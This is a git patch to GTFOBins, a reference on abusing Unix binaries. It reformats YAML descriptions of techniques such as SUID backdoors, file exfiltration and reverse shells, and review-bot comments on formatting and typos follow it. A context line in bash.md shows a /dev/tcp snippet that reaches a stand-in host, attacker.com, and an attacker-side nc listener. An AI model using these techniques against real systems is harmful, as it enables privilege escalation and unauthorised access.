From 5a1c87e7c50cfab1e9b53841b8cfe238ed03dd1c Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Fri, 1 Jun 2018 12:40:05 +0200 Subject: [PATCH] Fix YAML literal blocks --- _data/functions.yml | 57 +++++++++++++++++++++++++++++++++----------- _gtfobins/bash.md | 2 +- _gtfobins/busybox.md | 4 +++- _gtfobins/ld.so.md | 3 ++- _gtfobins/sort.md | 3 ++- _gtfobins/tee.md | 3 ++- _gtfobins/ul.md | 4 +++- _gtfobins/uniq.md | 3 ++- 8 files changed, 58 insertions(+), 21 deletions(-) diff --git a/_data/functions.yml b/_data/functions.yml index 1764a48..cb15696 100644 --- a/_data/functions.yml +++ b/_data/functions.yml 
@@ -1,55 +1,84 @@ execute-interactive: label: Interactive execute - description: It executes interactive commands that may be used to break out from restricted shells. + description: | + It executes interactive commands that may be used to break out from + restricted shells. execute-non-interactive: label: Non-interactive execute - description: It executes non-interactive commands that may be used to break out from restricted shells. + description: | + It executes non-interactive commands that may be used to break out from + restricted shells. suid-enabled: label: SUID - description: It runs with the SUID bit set and may be exploited to access the file system, escalate or maintain access with elevated privileges working as a SUID backdoor. If it is used to run `/bin/sh -p`, omit the `-p` on systems like Debian that allow to run a SUID shell by default. + description: | + It runs with the SUID bit set and may be exploited to access the file + system, escalate or maintain access with elevated privileges working as a + SUID backdoor. If it is used to run `/bin/sh -p`, omit the `-p` on systems + like Debian that allow to run a SUID shell by default. suid-limited: label: Limited SUID - description: It runs with the SUID bit set and may be exploited to access the file system, escalate or maintain access with elevated privileges working as a SUID backdoor. Running `/bin/sh` only works on Debian systems that allow SUID shell execution by default. + description: | + It runs with the SUID bit set and may be exploited to access the file + system, escalate or maintain access with elevated privileges working as a + SUID backdoor. Running `/bin/sh` only works on Debian systems that allow + SUID shell execution by default. sudo-enabled: label: Sudo - description: It runs in privileged context and may be used to access the file system, escalate or maintain access with elevated privileges if enabled on `sudo`. 
+ description: | + It runs in privileged context and may be used to access the file system, + escalate or maintain access with elevated privileges if enabled on `sudo`. download: label: Download - description: It can download remote files. + description: | + It can download remote files. upload: label: Upload - description: It can exfiltrate files on the network. + description: | + It can exfiltrate files on the network. bind-shell-interactive: label: Interactive bind shell - description: It can bind a shell to a local port to allow remote network access. + description: | + It can bind a shell to a local port to allow remote network access. reverse-shell-interactive: label: Interactive reverse shell - description: It can send back a reverse shell to a listening attacker to open a remote network access. + description: | + It can send back a reverse shell to a listening attacker to open a remote + network access. bind-shell-non-interactive: label: Non-interactive bind shell - description: It can bind a non-interactive shell to a local port to allow remote network access. + description: | + It can bind a non-interactive shell to a local port to allow remote network + access. reverse-shell-non-interactive: label: Non-interactive reverse shell - description: It can send back a non-interactive reverse shell to a listening attacker to open a remote network access. + description: | + It can send back a non-interactive reverse shell to a listening attacker to + open a remote network access. load-library: label: Library load - description: It loads shared libraries that may be used to run code in the binary execution context. + description: | + It loads shared libraries that may be used to run code in the binary + execution context. file-read: label: File read - description: It reads files and may be used to do privileged reads or disclose files outside a restricted file system. 
+ description: | + It reads files and may be used to do privileged reads or disclose files + outside a restricted file system. file-write: label: File write - description: It writes files and may be used to do privileged writes or write files outside a restricted file system. + description: | + It writes files and may be used to do privileged writes or write files + outside a restricted file system. diff --git a/_gtfobins/bash.md b/_gtfobins/bash.md index b04ff3c..5be8eea 100644 --- a/_gtfobins/bash.md +++ b/_gtfobins/bash.md @@ -29,7 +29,7 @@ functions: 3<>/dev/tcp/$RHOST/$RPORT \ | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE' - description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file. - code: |- + code: | export RHOST=attacker.com export RPORT=12345 export LFILE=file_to_get diff --git a/_gtfobins/busybox.md b/_gtfobins/busybox.md index dc295fc..c1eac8f 100644 --- a/_gtfobins/busybox.md +++ b/_gtfobins/busybox.md @@ -1,5 +1,7 @@ --- -description: BusyBox may contain many UNIX utilities, run `busybox --list-full` to check what GTFBins binaries are supported. Here some example. +description: | + BusyBox may contain many UNIX utilities, run `busybox --list-full` to check + what GTFBins binaries are supported. Here some example. functions: execute-interactive: - code: busybox sh diff --git a/_gtfobins/ld.so.md b/_gtfobins/ld.so.md index 84d96a4..b908a97 100644 --- a/_gtfobins/ld.so.md +++ b/_gtfobins/ld.so.md @@ -1,6 +1,7 @@ --- description: | - `ld.so` is the Linux dynamic linker/loader, its filename and location might change across distributions. The proper path is can be obtained with: + `ld.so` is the Linux dynamic linker/loader, its filename and location might + change across distributions. The proper path is can be obtained with: ``` $ strings /proc/self/exe | head -1 diff --git a/_gtfobins/sort.md b/_gtfobins/sort.md index 26fbc0d..fc34176 100644 
--- a/_gtfobins/sort.md +++ b/_gtfobins/sort.md @@ -1,5 +1,6 @@ --- -description: The read file content is corrupted by being sorted. +description: | + The read file content is corrupted by being sorted. functions: sudo-enabled: - code: | diff --git a/_gtfobins/tee.md b/_gtfobins/tee.md index f3fc36d..51b3558 100644 --- a/_gtfobins/tee.md +++ b/_gtfobins/tee.md @@ -1,5 +1,6 @@ --- -description: It can only append data if the destination exists. +description: | + It can only append data if the destination exists. functions: sudo-enabled: - code: | diff --git a/_gtfobins/ul.md b/_gtfobins/ul.md index 76af411..014d734 100644 --- a/_gtfobins/ul.md +++ b/_gtfobins/ul.md @@ -1,5 +1,7 @@ --- -description: The read file content is corrupted by replacing occurrences of `$'\b_'` to terminal sequences and by converting tabs to spaces. +description: | + The read file content is corrupted by replacing occurrences of `$'\b_'` to + terminal sequences and by converting tabs to spaces. functions: sudo-enabled: - code: | diff --git a/_gtfobins/uniq.md b/_gtfobins/uniq.md index 5bd5df1..b8b09f8 100644 --- a/_gtfobins/uniq.md +++ b/_gtfobins/uniq.md @@ -1,5 +1,6 @@ --- -description: The read file content is corrupted by squashing multiple adjacent lines. +description: | + The read file content is corrupted by squashing multiple adjacent lines. functions: sudo-enabled: - code: |
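Review bot: in _data/functions.yml every `description` moves from a plain scalar to a hard-wrapped `|` literal block, so each loaded value now contains the wrap newlines plus a trailing newline where it used to be a single line. If the wrapping is only for source readability, a folded block (`description: >-`) would keep the loaded string the same as before; if `|` is intended, confirm that the template rendering these descriptions treats single newlines as spaces and say so in the commit message, which has a subject line only.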
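Review bot: in _gtfobins/bash.md the change from `code: |-` to `code: |` alters the chomping indicator, so this snippet's value now ends with a newline it did not have before. That matches the `- code: |` form visible in the context lines of sort.md, tee.md, ul.md and uniq.md, but it is the only change to a `code` value in a patch that otherwise touches descriptions, so it deserves a line in the commit message explaining that it is deliberate.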
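Review bot: in _gtfobins/busybox.md the rewrapped description carries over the misspelling `GTFBins` (the directory in this same patch is `_gtfobins`) and the fragment "Here some example."; both lines are being rewritten anyway, so fix the wording in this change, for example "what GTFOBins binaries are supported. Here are some examples."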
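Review bot: in _gtfobins/ld.so.md the added second line still reads "The proper path is can be obtained with:", so the stray "is" survives the rewrap; drop it while the line is being touched. The block was already a `|` literal here, so this hunk is only a rewrap and the new line breaks become part of the value that precedes the fenced `strings` example.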
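Review bot: in _gtfobins/ul.md the rewrapped description keeps "replacing occurrences of `$'\b_'` to terminal sequences", which should read "with terminal sequences"; worth correcting while the line is rewritten. The `\b` itself is safe under this change, since neither a plain scalar nor a `|` block processes backslash escapes.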